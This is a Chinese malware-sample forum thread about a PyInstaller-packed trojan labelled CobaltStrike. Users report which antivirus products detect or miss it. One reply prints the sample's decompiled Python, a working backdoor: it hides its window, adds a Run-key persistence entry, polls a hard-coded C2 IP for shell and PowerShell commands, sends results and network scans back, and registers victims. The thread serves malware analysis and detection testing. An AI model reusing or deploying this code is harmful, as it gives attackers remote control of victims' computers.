CobaltStrike/Pyinstaller 1x

显示全部楼层 · 发表于 2024-3-24 22:52:33

https://www.123pan.com/s/sAX5Vv-IK2X.html
VT(4/72)

显示全部楼层 · 发表于 2024-3-24 22:55:21

显示全部楼层 · 发表于 2024-3-24 22:56:03

显示全部楼层 · 发表于 2024-3-24 23:32:49

显示全部楼层 · 发表于 2024-3-24 23:52:21

Kaspersky Kill

Event: Malicious object detected
User: LAPTOP\Fadouse
User type: Initiator
Application name: explorer.exe
Application path: C:\Windows
Component: File Anti-Virus
Result description: Detected
Type: Trojan
Name: UDS:Trojan.Win64.Shelm
Precision: Exactly
Threat level: High
Object type: File
Object name: run_code.exe
Object path: E:\Code\Virus
MD5 of an object: A1FE2997F33D33C75860F5FEFD961C54
Reason: Cloud Protection

复制代码

显示全部楼层 · 发表于 2024-3-25 00:00:08

本帖最后由 t0kenzero 于 2024-3-25 00:16 编辑

~~这算是个什么玩意?~~ 疯狂请求个404地址没看出来是cs

gethied()
global still
ct = win32api.GetConsoleTitle()
hd = win32gui.FindWindow(0, ct)
win32gui.ShowWindow(hd, 0)
still=1

getRegedit()
key_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path, 0, winreg.KEY_SET_VALUE)
value=sys.executable
winreg.SetValueEx(key, "test", 0, winreg.REG_SZ,value)

getCmd()
shellname = subprocess.run('hostname', shell=True, capture_output=True, text=True).stdout.strip()
url = f"http://38.12.0.151/GET/getUshell/output/{shellname}output.txt"
reUrl='http://38.12.0.151/GET/getUshell/results.php'
while 1:
try:
      time.sleep(5)
      resp = requests.get(url).text
      cmd = resp.strip()
      if cmd == 'getUfriends':
         netList=[]
         hisFriends=str(sniff_ip(netList))
         data = {'shellname': shellname, 'results': hisFriends}
         requests.post(reUrl, data)
         time.sleep(10)
      else:
         match = None
         try:
            pattern = re.compile(r'^powershell=')
            match = pattern.match(cmd)
         except:
            pass
         if match:
            threading.Thread(target=powershell,args=(cmd,)).start()
         else:
            shell = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
            data={'shellname':shellname,'results':shell}
            requests.post(reUrl,data)
except:
      pass

powershell()
powershell = cmd.split('powershell=')
subprocess.run(['powershell', '-Command', powershell[-1]], capture_output=True, text=True, check=True)

send()
try:
shellname = subprocess.run('hostname',shell=True,capture_output=True,text=True).stdout.strip()
sqlurl = f"http://38.12.0.151/GET/getUshell/userShells.php?shellname={shellname}&username={user}"
requests.get(sqlurl)
except:
pass

显示全部楼层 · 发表于 2024-3-25 00:57:45

EIS扫描miss

显示全部楼层 · 发表于 2024-3-25 01:31:37

本帖最后由 chx818 于 2024-3-25 01:34 编辑

双击ESET miss，ElasticSecurity击杀

显示全部楼层 · 发表于 2024-3-25 06:55:51

本帖最后由 DisaPDB 于 2024-3-25 07:01 编辑

t0kenzero 发表于 2024-3-25 00:00
~~这算是个什么玩意?~~ 疯狂请求个404地址没看出来是cs

我也没看出来
但微步标记了
马应该是那个C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\TEMP\_MEI67722\PYWINTYPES37.DLL

显示全部楼层 · 发表于 2024-3-25 08:05:40

360未知

[病毒样本] CobaltStrike/Pyinstaller 1x

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源